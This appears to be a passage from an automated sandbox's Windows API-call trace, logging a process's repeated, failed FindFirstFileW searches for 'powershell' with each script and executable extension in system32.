	[0435.834] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0435.842] SetErrorMode (uMode=0x1) returned 0x1
	[0435.843] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0435.843] SetErrorMode (uMode=0x1) returned 0x1
	[0435.843] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0436.820] SetErrorMode (uMode=0x1) returned 0x1
	[0436.821] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0436.822] SetErrorMode (uMode=0x1) returned 0x1
	[0436.822] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0436.830] SetErrorMode (uMode=0x1) returned 0x1
	[0436.831] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0436.831] SetErrorMode (uMode=0x1) returned 0x1
	[0436.831] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0436.839] SetErrorMode (uMode=0x1) returned 0x1
	[0436.841] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0436.841] SetErrorMode (uMode=0x1) returned 0x1
	[0436.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0436.858] SetErrorMode (uMode=0x1) returned 0x1
	[0436.860] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0436.860] SetErrorMode (uMode=0x1) returned 0x1
	[0436.860] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.575] SetErrorMode (uMode=0x1) returned 0x1
	[0437.576] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.576] SetErrorMode (uMode=0x1) returned 0x1
	[0437.576] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.584] SetErrorMode (uMode=0x1) returned 0x1
	[0437.586] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.586] SetErrorMode (uMode=0x1) returned 0x1
	[0437.586] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.594] SetErrorMode (uMode=0x1) returned 0x1
	[0437.595] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.596] SetErrorMode (uMode=0x1) returned 0x1
	[0437.596] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.604] SetErrorMode (uMode=0x1) returned 0x1
	[0437.605] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0437.605] SetErrorMode (uMode=0x1) returned 0x1
	[0437.606] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0437.614] SetErrorMode (uMode=0x1) returned 0x1
	[0438.031] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.031] SetErrorMode (uMode=0x1) returned 0x1
	[0438.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.040] SetErrorMode (uMode=0x1) returned 0x1
	[0438.041] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.042] SetErrorMode (uMode=0x1) returned 0x1
	[0438.042] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.050] SetErrorMode (uMode=0x1) returned 0x1
	[0438.052] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.052] SetErrorMode (uMode=0x1) returned 0x1
	[0438.052] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.426] SetErrorMode (uMode=0x1) returned 0x1
	[0438.427] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0438.427] SetErrorMode (uMode=0x1) returned 0x1
	[0438.428] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.435] SetErrorMode (uMode=0x1) returned 0x1
	[0438.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.437] SetErrorMode (uMode=0x1) returned 0x1
	[0438.437] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.437] SetErrorMode (uMode=0x1) returned 0x1
	[0438.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.438] SetErrorMode (uMode=0x1) returned 0x1
	[0438.438] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.438] SetErrorMode (uMode=0x1) returned 0x1
	[0438.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.438] SetErrorMode (uMode=0x1) returned 0x1
	[0438.438] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.439] SetErrorMode (uMode=0x1) returned 0x1
	[0438.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.439] SetErrorMode (uMode=0x1) returned 0x1
	[0438.439] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.439] SetErrorMode (uMode=0x1) returned 0x1
	[0438.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.439] SetErrorMode (uMode=0x1) returned 0x1
	[0438.440] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.440] SetErrorMode (uMode=0x1) returned 0x1
	[0438.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.440] SetErrorMode (uMode=0x1) returned 0x1
	[0438.440] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.441] SetErrorMode (uMode=0x1) returned 0x1
	[0438.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.441] SetErrorMode (uMode=0x1) returned 0x1
	[0438.441] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.441] SetErrorMode (uMode=0x1) returned 0x1
	[0438.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.442] SetErrorMode (uMode=0x1) returned 0x1
	[0438.442] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.442] SetErrorMode (uMode=0x1) returned 0x1
	[0438.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.442] SetErrorMode (uMode=0x1) returned 0x1
	[0438.442] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.443] SetErrorMode (uMode=0x1) returned 0x1
	[0438.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.443] SetErrorMode (uMode=0x1) returned 0x1
	[0438.443] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.443] SetErrorMode (uMode=0x1) returned 0x1
	[0438.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.443] SetErrorMode (uMode=0x1) returned 0x1
	[0438.444] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.444] SetErrorMode (uMode=0x1) returned 0x1
	[0438.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.444] SetErrorMode (uMode=0x1) returned 0x1
	[0438.444] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.444] SetErrorMode (uMode=0x1) returned 0x1
	[0438.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.445] SetErrorMode (uMode=0x1) returned 0x1
	[0438.445] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.445] SetErrorMode (uMode=0x1) returned 0x1
	[0438.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.445] SetErrorMode (uMode=0x1) returned 0x1
	[0438.445] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c6ee020 | out: lpFindFileData=0x1c6ee020*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0438.446] SetErrorMode (uMode=0x1) returned 0x1
	[0438.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6ede80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0438.446] SetErrorMode (uMode=0x1) returned 0x1
